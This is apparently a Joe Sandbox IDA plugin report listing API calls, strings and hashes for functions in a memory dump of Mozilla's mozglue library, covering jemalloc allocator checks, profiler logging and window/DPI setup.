                                                                  • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
                                                                  • API String ID: 4047164644-4173974723
                                                                  • Opcode ID: 15ae9021ace22e03c9bbf3697f542c30118e7ca69f3fde8c7685bec518cfb9f9
                                                                  • Instruction ID: cae0a47e7c75adb230ff51a6aad07f5effc5c92864f38ed3e1354093cbc9b57d
                                                                  • Opcode Fuzzy Hash: 15ae9021ace22e03c9bbf3697f542c30118e7ca69f3fde8c7685bec518cfb9f9
                                                                  • Instruction Fuzzy Hash: 6A538072A057018FD704CF29C980655BBE1BFC9328F29C66DE8698B7A1D739E841CF85
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C630F1F
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C630F99
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C630FB7
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C630FE9
                                                                  • memset.VCRUNTIME140(?,000000E5,00000000), ref: 6C631031
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C6310D0
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C63117D
                                                                  • memset.VCRUNTIME140(?,000000E5,?), ref: 6C631C39
                                                                  • EnterCriticalSection.KERNEL32(6C67E744), ref: 6C633391
                                                                  • LeaveCriticalSection.KERNEL32(6C67E744), ref: 6C6333CD
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C633431
                                                                  • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C633437
                                                                  Strings
                                                                  • MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C6337D2
                                                                  • MALLOC_OPTIONS, xrefs: 6C6335FE
                                                                  • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C6337A8
                                                                  • : (malloc) Unsupported character in malloc options: ', xrefs: 6C633A02
                                                                  • MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6C633793
                                                                  • MOZ_RELEASE_ASSERT(mNode), xrefs: 6C633559, 6C63382D, 6C633848
                                                                  • MOZ_CRASH(), xrefs: 6C633950
                                                                  • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C6337BD
                                                                  • Compile-time page size does not divide the runtime one., xrefs: 6C633946
                                                                  • <jemalloc>, xrefs: 6C633941, 6C6339F1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
                                                                  • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
                                                                  • API String ID: 3040639385-4173974723
                                                                  • Opcode ID: 508a9dc7c9770e84e140e83756d3e05c7fda16a06dccc5c099aad099ae23d15d
                                                                  • Instruction ID: fce543255b21c3b852b39cceda72e2218bea27387fb3202f4a176df48b37cbfa
                                                                  • Opcode Fuzzy Hash: 508a9dc7c9770e84e140e83756d3e05c7fda16a06dccc5c099aad099ae23d15d
                                                                  • Instruction Fuzzy Hash: 4B53AD71A057218FD304CF29C580616FBE1BF89328F29E66DE86D9B791D731E842CB85
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(user32,?,6C62E1A5), ref: 6C655606
                                                                  • LoadLibraryW.KERNEL32(gdi32,?,6C62E1A5), ref: 6C65560F
                                                                  • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C655633
                                                                  • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C65563D
                                                                  • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C65566C
                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C65567D
                                                                  • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C655696
                                                                  • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C6556B2
                                                                  • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C6556CB
                                                                  • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C6556E4
                                                                  • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C6556FD
                                                                  • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C655716
                                                                  • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C65572F
                                                                  • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C655748
                                                                  • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C655761
                                                                  • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C65577A
                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C655793
                                                                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C6557A8
                                                                  • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C6557BD
                                                                  • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C6557D5
                                                                  • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C6557EA
                                                                  • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C6557FF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad
                                                                  • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                  • API String ID: 2238633743-1964193996
                                                                  • Opcode ID: fdbd16f0e49f1e905e7bf91ce18ff72271f5fa8cffed24cb853312886872316b
                                                                  • Instruction ID: 7bc4ceaed1d54b8a9bdd1c7095f371c1c24cf32898b7504a3ca51bfc9ee59009
                                                                  • Opcode Fuzzy Hash: fdbd16f0e49f1e905e7bf91ce18ff72271f5fa8cffed24cb853312886872316b
                                                                  • Instruction Fuzzy Hash: 8B513A706117329BEB069F378D98D263AF86B46349F604C25E921E2B51EF70C8118F7D
                                                                  APIs
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C653527
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C65355B
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6535BC
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6535E0
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C65363A
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C653693
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6536CD
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C653703
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C65373C
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C653775
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C65378F
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C653892
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6538BB
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C653902
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C653939
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C653970
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6539EF
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C653A26
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C653AE5
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C653E85
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C653EBA
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C653EE2
                                                                    • Part of subcall function 6C656180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C6561DD
                                                                    • Part of subcall function 6C656180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C65622C
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6540F9
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C65412F
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C654157
                                                                    • Part of subcall function 6C656180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C656250
                                                                    • Part of subcall function 6C656180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C656292
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C65441B
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C654448
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C65484E
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C654863
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C654878
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C654896
                                                                  • free.MOZGLUE ref: 6C65489F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: floor$free$malloc$memcpy
                                                                  • String ID:
                                                                  • API String ID: 3842999660-3916222277
                                                                  • Opcode ID: 6c639a0490917ded9bf982591b1b149bbc841dd2555e78d2a3bcc3234d35c231
                                                                  • Instruction ID: 7a97abd95812d8cdb2727d5709fe682ba58106af7edd815b1132497a8b9a8ace
                                                                  • Opcode Fuzzy Hash: 6c639a0490917ded9bf982591b1b149bbc841dd2555e78d2a3bcc3234d35c231
                                                                  • Instruction Fuzzy Hash: A5F25E74508B808FC725CF29C0846AAFBF1FFCA304F618A5ED98997711DB719896CB46
                                                                  APIs
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C63F09B
                                                                    • Part of subcall function 6C615B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6156EE,?,00000001), ref: 6C615B85
                                                                    • Part of subcall function 6C615B50: EnterCriticalSection.KERNEL32(6C67F688,?,?,?,6C6156EE,?,00000001), ref: 6C615B90
                                                                    • Part of subcall function 6C615B50: LeaveCriticalSection.KERNEL32(6C67F688,?,?,?,6C6156EE,?,00000001), ref: 6C615BD8
                                                                    • Part of subcall function 6C615B50: GetTickCount64.KERNEL32 ref: 6C615BE4
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C63F0AC
                                                                    • Part of subcall function 6C615C50: GetTickCount64.KERNEL32 ref: 6C615D40
                                                                    • Part of subcall function 6C615C50: EnterCriticalSection.KERNEL32(6C67F688), ref: 6C615D67
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C63F0BE
                                                                    • Part of subcall function 6C615C50: __aulldiv.LIBCMT ref: 6C615DB4
                                                                    • Part of subcall function 6C615C50: LeaveCriticalSection.KERNEL32(6C67F688), ref: 6C615DED
                                                                  • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C63F155
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C63F1E0
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C63F1ED
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C63F212
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C63F229
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C63F231
                                                                  • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C63F248
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C63F2AE
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C63F2BB
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C63F2F8
                                                                    • Part of subcall function 6C62CBE8: GetCurrentProcess.KERNEL32(?,6C5F31A7), ref: 6C62CBF1
                                                                    • Part of subcall function 6C62CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C5F31A7), ref: 6C62CBFA
                                                                    • Part of subcall function 6C639420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C63945E
                                                                    • Part of subcall function 6C639420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C639470
                                                                    • Part of subcall function 6C639420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C639482
                                                                    • Part of subcall function 6C639420: __Init_thread_footer.LIBCMT ref: 6C63949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C63F350
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C63F35D
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C63F381
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C63F398
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C63F3A0
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C63F489
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C63F491
                                                                    • Part of subcall function 6C6394D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C6394EE
                                                                    • Part of subcall function 6C6394D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C639508
                                                                  • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C63F3CF
                                                                    • Part of subcall function 6C63F070: GetCurrentThreadId.KERNEL32 ref: 6C63F440
                                                                    • Part of subcall function 6C63F070: AcquireSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C63F44D
                                                                    • Part of subcall function 6C63F070: ReleaseSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C63F472
                                                                  • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C63F4A8
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C63F559
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C63F561
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C63F577
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C63F585
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C63F5A3
                                                                  Strings
                                                                  • [I %d/%d] profiler_pause_sampling, xrefs: 6C63F3A8
                                                                  • [I %d/%d] profiler_resume_sampling, xrefs: 6C63F499
                                                                  • [I %d/%d] profiler_resume, xrefs: 6C63F239
                                                                  • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C63F56A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentExclusiveLock$Thread$AcquireRelease$CriticalSectionTime_getpid$?profiler_time@baseprofiler@mozilla@@getenv$Count64EnterLeaveProcessStampTickV01@@Value@mozilla@@$BaseCounterDurationInit_thread_footerNow@PerformancePlatformQuerySeconds@Stamp@mozilla@@TerminateUtils@mozilla@@V12@___acrt_iob_func__aulldiv__stdio_common_vfprintf
                                                                  • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                  • API String ID: 565197838-2840072211
                                                                  • Opcode ID: b67e66be6b0e89d9c014ea12fd0da326510e1ce337ed68d93a7b5d1d26df0449
                                                                  • Instruction ID: 58ef446d6757aa8b714acac08c5437bb3cdf0a1c46bd513cdc5e7c7d801fb08c
                                                                  • Opcode Fuzzy Hash: b67e66be6b0e89d9c014ea12fd0da326510e1ce337ed68d93a7b5d1d26df0449
                                                                  • Instruction Fuzzy Hash: BCD11731604220DFDB159F6AD484BA977F4EF87368F141D69E95983B82CB7048188BBF
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C6064DF
                                                                  • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C6064F2
                                                                  • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C606505
                                                                  • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C606518
                                                                  • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C60652B
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C60671C
                                                                  • GetCurrentProcess.KERNEL32 ref: 6C606724
                                                                  • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C60672F
                                                                  • GetCurrentProcess.KERNEL32 ref: 6C606759
                                                                  • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C606764
                                                                  • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C606A80
                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C606ABE
                                                                  • __Init_thread_footer.LIBCMT ref: 6C606AD3
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C606AE8
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C606AF7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                  • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                  • API String ID: 487479824-2878602165
                                                                  • Opcode ID: bc6774e0d32f14454aa1256b20ac424321f8774a0083a749a894ffa254abf7ba
                                                                  • Instruction ID: 87491dba0512ad09f0b23b633ef008bacd902d6723e85ee1804bb6bfe8afda72
                                                                  • Opcode Fuzzy Hash: bc6774e0d32f14454aa1256b20ac424321f8774a0083a749a894ffa254abf7ba
                                                                  • Instruction Fuzzy Hash: 42F10770A056299FDB24DF25CE887DAB7B4AF46318F044198DC09A3640E731EAC5CFA9
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C61D904
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C61D971
                                                                  • memset.VCRUNTIME140(?,00000000,?), ref: 6C61D97B
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C61E2E3
                                                                  • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C61E2E9
                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C61E308
                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C61E315
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C67E804), ref: 6C61E37C
                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C61E3C7
                                                                  • __Init_thread_footer.LIBCMT ref: 6C61E3DA
                                                                  • GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6C67E810,00000040), ref: 6C61E404
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6C67E7B8,00001388), ref: 6C61E46D
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6C67E744,00001388), ref: 6C61E483
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6C67E784,00001388), ref: 6C61E4A9
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6C67E7DC,00001388), ref: 6C61E4CA
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6C67E768,00001388), ref: 6C61E50C
                                                                  • memset.VCRUNTIME140(00000000,00000000,00004000), ref: 6C61E52E
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C67E804), ref: 6C61E54F
                                                                    • Part of subcall function 6C60D960: EnterCriticalSection.KERNEL32(?), ref: 6C60D999
                                                                    • Part of subcall function 6C60D960: EnterCriticalSection.KERNEL32(6C67E7B8), ref: 6C60DA13
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$CountInitializeSpin$Enter$ExclusiveK@1@LeaveLockMaybe@_RandomUint64@mozilla@@memset$AcquireEnvironmentInfoInit_thread_footerReleaseSystemVariable_errno
                                                                  • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(mNode)
                                                                  • API String ID: 919329573-429003945
                                                                  • Opcode ID: fa481a6a8229c1e7b46a5bdbf44ac83bcc64af3670f6198e73edfd791422a904
                                                                  • Instruction ID: 56104dfc4ea209c8ff07cd2b945482c37e7b32424165bf41e467b39394cf190f
                                                                  • Opcode Fuzzy Hash: fa481a6a8229c1e7b46a5bdbf44ac83bcc64af3670f6198e73edfd791422a904
                                                                  • Instruction Fuzzy Hash: EB92EE71A096118FD709CF2DC484755BBE1BF86329F19CA6DE8698BB91D331E841CBC8
                                                                  APIs
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C65C5F9
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C65C6FB
                                                                  • memset.VCRUNTIME140(?,00000000,00004008), ref: 6C65C74D
                                                                  • memset.VCRUNTIME140(?,00000000,00004008), ref: 6C65C7DE
                                                                  • memset.VCRUNTIME140(?,00000000,00004014), ref: 6C65C9D5
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C65CC76
                                                                  • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C65CD7A
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C65DB40
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C65DB62
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C65DB99
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C65DD8B
                                                                  • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C65DE95
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C65E360
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C65E432
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C65E472
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: memset$memcpy
                                                                  • String ID:
                                                                  • API String ID: 368790112-0
                                                                  • Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
                                                                  • Instruction ID: 70c1fa1f327032f70af44735b2074df8f6e7b065a6db3d30d5881a8ac5e5f63d
                                                                  • Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
                                                                  • Instruction Fuzzy Hash: 8C33CE71E0021ACFCB04CFA8C8806EDBBF2FF49304F688269D955AB795D731A955CB94
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C61EE7A
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C61EFB5
